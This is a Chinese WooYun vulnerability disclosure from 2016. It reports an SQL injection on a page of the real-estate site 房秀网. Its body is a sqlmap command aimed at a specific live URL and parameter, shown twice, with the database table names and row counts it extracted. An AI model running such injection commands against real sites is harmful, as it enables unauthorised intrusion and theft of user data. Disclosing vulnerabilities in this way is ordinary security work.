当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0187984

漏洞标题:房秀网某处存在SQL注入

相关厂商:房秀网

漏洞作者: 黑色键盘丶

提交时间:2016-03-23 14:40

修复时间:2016-05-07 14:40

公开时间:2016-05-07 14:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

注入点:[root@Hacker~]# Sqlmap -u "http://cs.funxoo.com/eshouselist.php?catid=78&posids=
13&p= posids=13" -D fx_newwebsite_cs --count --tables


1.png


Database: fx_newwebsite_cs
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| fx_log | 47225 |
| fx_search | 39041 |
| fx_content_tag | 30978 |
| fx_hits | 28850 |
| fx_attachment | 28041 |
| fx_content_position | 13822 |
| fx_pay_exchange | 10332 |
| fx_ads_stat | 5830 |
| fx_keyword | 5519 |
| fx_content | 2263 |
| fx_content_count | 2187 |
| fx_c_news | 1912 |
| fx_spider_urls | 1740 |
| fx_admin_role_priv | 1688 |
| fx_c_house | 1621 |
| fx_member | 1521 |
| fx_member_cache | 1521 |
| fx_member_info | 1520 |
| fx_space | 1515 |
| fx_member_detail | 932 |
| fx_member_group_priv | 920 |
| fx_keylink | 530 |
| fx_menu | 529 |
| fx_c_zt | 515 |
| fx_copyfrom | 479 |
| fx_model_field | 450 |
| fx_member_agent | 411 |
| fx_cache_count | 338 |
| fx_mood_data | 316 |
| fx_digg_log | 307 |
| fx_author | 286 |
| fx_digg | 244 |
| fx_c_video | 198 |
| fx_category | 193 |
| fx_member_companys | 137 |
| fx_pay_stat | 125 |
| fx_ask_posts | 110 |
| fx_c_picture | 86 |
| fx_ads | 77 |
| fx_ask | 68 |
| fx_type | 57 |
| fx_editor_data | 53 |
| fx_comment | 52 |
| fx_c_eshouse | 45 |
| fx_spider_job | 45 |
| fx_ads_place | 43 |
| fx_ask_credit | 36 |
| fx_urlrule | 29 |
| fx_position | 26 |
| fx_ask_actor | 25 |
| fx_link | 22 |
| fx_module | 22 |
| fx_form_tuangou | 21 |
| fx_process_status | 21 |
| fx_block | 20 |
| fx_c_czhouse | 19 |
| fx_admin_role | 18 |
| fx_mail_email | 18 |
| fx_model | 18 |
| fx_admin | 14 |
| fx_area | 13 |
| fx_mail_email_type | 12 |
| fx_mail | 11 |
| fx_message | 11 |
| fx_formguide_fields | 10 |
| fx_vote_option | 9 |
| fx_special_content | 8 |
| fx_member_group | 7 |
| fx_status | 7 |
| fx_role | 6 |
| fx_search_type | 6 |
| fx_player | 5 |
| fx_spider_sites | 5 |
| fx_member_company | 4 |
| fx_times | 4 |
| fx_yp_stats | 4 |
| fx_session | 3 |
| fx_space_api | 3 |
| fx_special | 3 |
| fx_vote_subject | 3 |
| fx_yp_count | 3 |
| fx_error_report | 2 |
| fx_pay_pointcard_type | 2 |
| fx_ask_vote | 1 |
| fx_formguide | 1 |
| fx_mood | 1 |
| fx_process | 1 |
| fx_vote_useroption | 1 |
| fx_workflow | 1 |
+-----------------------+---------+


漏洞证明:

注入点:[root@Hacker~]# Sqlmap -u "http://cs.funxoo.com/eshouselist.php?catid=78&posids=
13&p= posids=13" -D fx_newwebsite_cs --count --tables


1.png


Database: fx_newwebsite_cs
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| fx_log | 47225 |
| fx_search | 39041 |
| fx_content_tag | 30978 |
| fx_hits | 28850 |
| fx_attachment | 28041 |
| fx_content_position | 13822 |
| fx_pay_exchange | 10332 |
| fx_ads_stat | 5830 |
| fx_keyword | 5519 |
| fx_content | 2263 |
| fx_content_count | 2187 |
| fx_c_news | 1912 |
| fx_spider_urls | 1740 |
| fx_admin_role_priv | 1688 |
| fx_c_house | 1621 |
| fx_member | 1521 |
| fx_member_cache | 1521 |
| fx_member_info | 1520 |
| fx_space | 1515 |
| fx_member_detail | 932 |
| fx_member_group_priv | 920 |
| fx_keylink | 530 |
| fx_menu | 529 |
| fx_c_zt | 515 |
| fx_copyfrom | 479 |
| fx_model_field | 450 |
| fx_member_agent | 411 |
| fx_cache_count | 338 |
| fx_mood_data | 316 |
| fx_digg_log | 307 |
| fx_author | 286 |
| fx_digg | 244 |
| fx_c_video | 198 |
| fx_category | 193 |
| fx_member_companys | 137 |
| fx_pay_stat | 125 |
| fx_ask_posts | 110 |
| fx_c_picture | 86 |
| fx_ads | 77 |
| fx_ask | 68 |
| fx_type | 57 |
| fx_editor_data | 53 |
| fx_comment | 52 |
| fx_c_eshouse | 45 |
| fx_spider_job | 45 |
| fx_ads_place | 43 |
| fx_ask_credit | 36 |
| fx_urlrule | 29 |
| fx_position | 26 |
| fx_ask_actor | 25 |
| fx_link | 22 |
| fx_module | 22 |
| fx_form_tuangou | 21 |
| fx_process_status | 21 |
| fx_block | 20 |
| fx_c_czhouse | 19 |
| fx_admin_role | 18 |
| fx_mail_email | 18 |
| fx_model | 18 |
| fx_admin | 14 |
| fx_area | 13 |
| fx_mail_email_type | 12 |
| fx_mail | 11 |
| fx_message | 11 |
| fx_formguide_fields | 10 |
| fx_vote_option | 9 |
| fx_special_content | 8 |
| fx_member_group | 7 |
| fx_status | 7 |
| fx_role | 6 |
| fx_search_type | 6 |
| fx_player | 5 |
| fx_spider_sites | 5 |
| fx_member_company | 4 |
| fx_times | 4 |
| fx_yp_stats | 4 |
| fx_session | 3 |
| fx_space_api | 3 |
| fx_special | 3 |
| fx_vote_subject | 3 |
| fx_yp_count | 3 |
| fx_error_report | 2 |
| fx_pay_pointcard_type | 2 |
| fx_ask_vote | 1 |
| fx_formguide | 1 |
| fx_mood | 1 |
| fx_process | 1 |
| fx_vote_useroption | 1 |
| fx_workflow | 1 |
+-----------------------+---------+


修复方案:

过滤

版权声明:转载请注明来源 黑色键盘丶@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)